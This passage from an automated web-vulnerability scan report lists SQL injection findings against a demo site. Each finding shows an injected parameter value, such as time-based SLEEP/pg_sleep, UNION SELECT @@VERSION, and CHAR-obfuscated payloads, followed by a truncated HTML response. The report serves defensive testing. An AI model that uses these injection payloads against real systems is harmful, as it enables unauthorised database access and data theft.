href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #616\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #617\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #618\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AS INJECTX WHERE 1=1 AND 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #619\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #620Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #621\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #622\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #623\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #624\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\"^\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #625\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #626\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #627\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #628\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #629\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 